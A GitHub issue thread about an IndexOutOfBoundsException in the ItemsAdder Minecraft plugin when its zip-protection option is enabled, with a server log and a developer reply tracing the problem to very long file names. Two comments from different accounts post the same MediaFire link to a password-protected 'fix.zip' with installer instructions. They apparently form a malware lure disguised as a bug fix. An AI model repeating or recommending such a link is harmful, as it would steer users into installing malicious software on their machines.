### ISSUE TITLE
`protection_2` enabled leads to `IndexOutOfBoundsException` exception

### ISSUE THREAD

**Issue by PGMCgit** [PluginBugs/Issues-ItemsAdder#3919]
### Terms

- [X] I'm using the very latest version of ItemsAdder and its dependencies.
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/PluginBugs/Issues-ItemsAdder/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://itemsadder.devs.beer/) to know if a solution is already known.
- [X] I already searched on the [forums](https://forum.devs.beer/) to check if anyone already has a solution for this.
- [X] I tested this with just ItemsAdder and its dependencies and with a vanilla client of the same version as the Server.

### Discord Username (optional)

ca.exe

### What happened?

On /iazip, IA attempts to protect the RP, and it fails. 

### Steps to reproduce the issue

Not exactly sure.
I was in the contents editing json files, and went to see changes with /iazip, and it happened. Even after undoing changes, issue persists.
Workaround is to disable protection_2 in config.

### Server version

This server is running Paper version git-Paper-497 (MC: 1.20.4) (Implementing API version 1.20.4-R0.1-SNAPSHOT) (Git: d8d54d9 on ver/1.20.4)
You are running the latest version

### ItemsAdder Version

3.6.4r3

### ProtocolLib Version

5.2.0-SNAPSHOT-679

### LoneLibs Version

LoneLibs version 1.0.56

### Full Server Log

https://mclo.gs/ovQHqWC

### Error (optional)

```shell
issued server command: /iazip
[ItemsAdder]: [Host] Stopped self-host webserver on port: 8163
WARN01:28:13
[ItemsAdder]: (Liquids disabled. If you want to use liquids enable them in config.yml please)
INFO01:28:13
[ItemsAdder]: [Host] Starting self-host webserver on port: 8163
WARN01:28:13
[ItemsAdder]: Warning: forcefully setting player resourcepack status to installed because the plugin was reloaded.
[ItemsAdder]: Warning: forcefully setting player resourcepack status to installed because the plugin was reloaded.
INFO01:28:13
[ItemsAdder]: [Pack] Extracting internal contents from .jar
[ItemsAdder]: [Pack] DONE extracting internal contents from .jar
[ItemsAdder]: Loaded 2939 items
[ItemsAdder]: Used 0/188 REAL block IDs
[ItemsAdder]: Used 61/750 REAL_NOTE block IDs
[ItemsAdder]: Used 0/63 REAL_TRANSPARENT block IDs
[ItemsAdder]: Used 0/127 REAL_WIRE block IDs
[ItemsAdder]: Used 0/14 FIRE block IDs
[ItemsAdder]: Used 753/6608 font_images
[ItemsAdder]: [Init] Loaded 89 categories
[ItemsAdder]: [Init] Loaded successfully in s
[ItemsAdder]:
[ItemsAdder]:
[ItemsAdder]: [Pack] Started generation
[PlaceholderAPI]: Successfully registered internal expansion: img [1.0.1]
[PlaceholderAPI]: Successfully registered internal expansion: iaplayerstat [1.0.1]
[OreRegenerator]: Finished populating furniture IDs in 16ms!
[Mythic]: Reloading plugin...
[MythicMobs]: Saving plugin data...
[MythicMobs]: ✓Saving Finished
[MythicMobs]: Loading Packs...
01:28:14
[MythicMobs]: Loading Items...
[MythicMobs]: Loading Item Groups...
[MythicMobs]: Loading Skills...
[MythicMobs]: Loading Drop Tables...
[MythicMobs]: Loading Random Spawns...
[MythicMobs]: Loading Spawn Blocks...
[MythicMobs]: ✓ Loaded 57 mobs.
[MythicMobs]: ✓ Loaded 3 vanilla mob overrides.
[MythicMobs]: ✓ Loaded 0 mob stacks.
[MythicMobs]: ✓ Loaded 57 skills.
[MythicMobs]: ✓ Loaded 0 random spawns.
[MythicMobs]: ✓ Loaded 142 mythic items.
[MythicMobs]: ✓ Loaded 2 drop tables.
[MythicMobs]: ✓ Loaded 0 mob spawners.
[Mythic]: Mythic has finished reloading!
[MythicMobs]: Mythic has finished reloading!
[OreRegenerator]: ItemsAdder has finished loading, deserializing 5 blocks...
[OreRegenerator]: Finished deserializing 5 blocks!
01:28:15
[ItemsAdder]:
[ItemsAdder]: [Pack] Generated resourcepack
[ItemsAdder]: [OK] Your zip file will be protected from unzip (as set in config.yml)
[ItemsAdder]: [Pack] Compressing resource_pack ...
ERROR01:28:17
[ItemsAdder]: Failed to protect zip file.
WARN01:28:17
java.lang.IndexOutOfBoundsException
at java.base/java.io.RandomAccessFile.writeBytes0(Native Method)
at java.base/java.io.RandomAccessFile.writeBytes(RandomAccessFile.java:572)
at java.base/java.io.RandomAccessFile.write(RandomAccessFile.java:602)
at ItemsAdder_3.6.4-release-3.jar//ia.m.qk.e(SourceFile:116)
at ItemsAdder_3.6.4-release-3.jar//ia.m.pZ.a(SourceFile:229)
at ItemsAdder_3.6.4-release-3.jar//ia.m.qd.a(SourceFile:454)
at org.bukkit.craftbukkit.v1_20_R3.scheduler.CraftTask.run(CraftTask.java:101)
at org.bukkit.craftbukkit.v1_20_R3.scheduler.CraftAsyncTask.run(CraftAsyncTask.java:57)
at com.destroystokyo.paper.ServerSchedulerReportingWrapper.run(ServerSchedulerReportingWrapper.java:22)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
at java.base/java.lang.Thread.run(Thread.java:1583)
INFO01:28:17
[ItemsAdder]:
[ItemsAdder]:
[ItemsAdder]: [Pack] Saved into /Minecraft/plugins/ItemsAdder/output/generated.zip
[ItemsAdder]: [Pack] Compressed in 1829ms
[ItemsAdder]: [Pack] Applying to every player...
[ItemsAdder]: [Pack] Applied to 2 players
```

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LoneDev6** [comment]
There is no clear way to reproduce the issue for now, it works fine for more than 12.000 servers, so it's probably a single file interfering.
Can you try removing files until you find the cause? Each time you remove a file or group of files you have to run /iazip obviously.

**Comment by LoneDev6** [comment]
It was caused by very long file names
